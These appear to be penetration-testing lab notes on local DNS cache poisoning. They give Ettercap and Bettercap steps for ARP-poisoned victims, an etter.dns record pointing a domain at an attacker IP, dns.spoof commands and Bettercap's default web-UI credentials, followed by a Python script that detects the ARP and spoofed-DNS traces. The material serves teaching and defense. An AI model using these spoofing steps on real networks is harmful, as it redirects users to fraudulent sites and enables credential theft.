Local DNS Cache Poisoning

This attack replaces legitimate DNS records with false information so that traffic for a domain is redirected to a fraudulent website.

! It first requires ARP poisoning of the victims.

Ettercap (GUI).

  • Edit the /etc/ettercap/etter.dns file to map the domain name you want to spoof to the attacker's IP address that users should be redirected to.

  • Select one or more targets and add them to the scope.

  • Activate the dns_spoof attack by navigating to Plugins > Manage Plugins.

# Example for step 1 (/etc/ettercap/etter.dns)
inlanefreight.com      A   192.168.225.110
*.inlanefreight.com    A   192.168.225.110

Bettercap (command line).

set dns.spoof.domains <DOMAIN>
# Specify the domain you want to manipulate
set dns.spoof.address <IP>
# Specify which address the manipulated domain will point to
dns.spoof on
# Turn the module on (dns.spoof off turns it off)

Bettercap (web UI).

sudo bettercap -eval "caplets.update; ui.update; q"
sudo bettercap -caplet http-ui 

Default credentials: user:pass. Change them in /usr/share/bettercap/caplets/http-ui.cap
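
Detection side of the two conditions described on this page (ARP poisoning first, then spoofed A records), as an added example that is not part of the original notes. The neighbor-table lines and resolver results are constructed sample data reusing the page's example domain and address, the function names are hypothetical, and the check assumes the monitored names are internet-facing and should never resolve to a private address.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed `ip neigh` output from a victim host (sample data).
NEIGH = """\
192.168.225.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.225.110 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
192.168.225.50 dev eth0 lladdr 08:00:27:11:22:33 STALE
"""

# Constructed resolver results: (queried name, returned A record).
ANSWERS = [
    ("inlanefreight.com", "192.168.225.110"),
    ("www.inlanefreight.com", "192.168.225.110"),
    ("example.org", "93.184.216.34"),
]

def shared_macs(neigh_text):
    """Return {mac: [ips]} for every MAC that answers for more than one IP.

    One MAC claiming both the gateway IP and a host IP is the usual trace
    that ARP poisoning leaves in a victim's neighbor table.
    """
    by_mac = defaultdict(list)
    for m in re.finditer(r"^(\S+) dev \S+ lladdr (\S+)", neigh_text, re.M):
        by_mac[m.group(2).lower()].append(m.group(1))
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}

def suspicious_answers(answers, neigh_text):
    """Return (name, address, mac_is_shared) for names resolving to private IPs.

    mac_is_shared is True when the returned address belongs to a MAC that
    also claims another IP, which ties the DNS answer to the ARP anomaly.
    """
    flagged_ips = {ip for ips in shared_macs(neigh_text).values() for ip in ips}
    hits = []
    for name, addr in answers:
        if ipaddress.ip_address(addr).is_private:
            hits.append((name, addr, addr in flagged_ips))
    return hits

if __name__ == "__main__":
    print("MACs claiming several IPs:", shared_macs(NEIGH))
    for name, addr, shared in suspicious_answers(ANSWERS, NEIGH):
        print(f"ALERT {name} -> {addr} (MAC shared with another IP: {shared})")
```

Names served by an internal split-horizon DNS legitimately resolve to private addresses and should be kept out of the monitored list.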
